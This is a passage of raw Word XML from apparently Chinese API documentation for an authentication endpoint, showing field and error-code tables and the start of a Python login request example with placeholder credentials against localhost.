      <w:tr w:rsidR="00BC669E" w14:paraId="1757CDD4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="678BF791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FA554D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04B46372" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>错误描述，认证失败时可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C892E79" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E800773" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30AA7A8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="172C60C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BE5C936" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C8A7AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD5A23E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57BDEACE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>认证后的token串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F008685" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2964F76F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>signKey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2175167F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23ECD051" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>签名key，参数签名中使用的签名key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62358703" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>认证失败返回的错误码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3229"/>
        <w:gridCol w:w="2924"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E92480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A89711B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>错误码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C4EBAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2310F4E8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE12761" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>LOGIN_ERROR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24B085FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E477D2C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C903262" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>HEADER_NULL_COM_ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E9CC18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BACCD17" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1799F3A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>HEADER_NULL_TIMESTAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="082417AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>timestamp请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B658EFD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F44E09E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>HEADER_NULL_SIGN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7069F193" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sign请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53A7BB92" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="722B39AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>AUTH_SIGN_FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F50A3C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证签名失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FCE3A19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64D3A561" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>AUTH_VERIFY_JWT_FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="267C762C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4607C7FE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759788D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>INVALID_JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51690C40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>非法的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A3DE744" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="339045D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>HEADER_NULL_AUTHORIZATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40D36E5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>authorization请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08A8B4FE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03DDCA63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>AUTH_ERROR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA9F1A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>认证发生错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B342A99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52FD82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> __future__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>absolute_import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>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StringTok"/>
        </w:rPr>
        <w:t>"http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>/auth"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"Content-Type"</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NormalTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"dev@xx.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"abc@123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>(method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>, body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>, headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    res </w:t>
      </w:r>
      <w:r>
        <w:rPr>
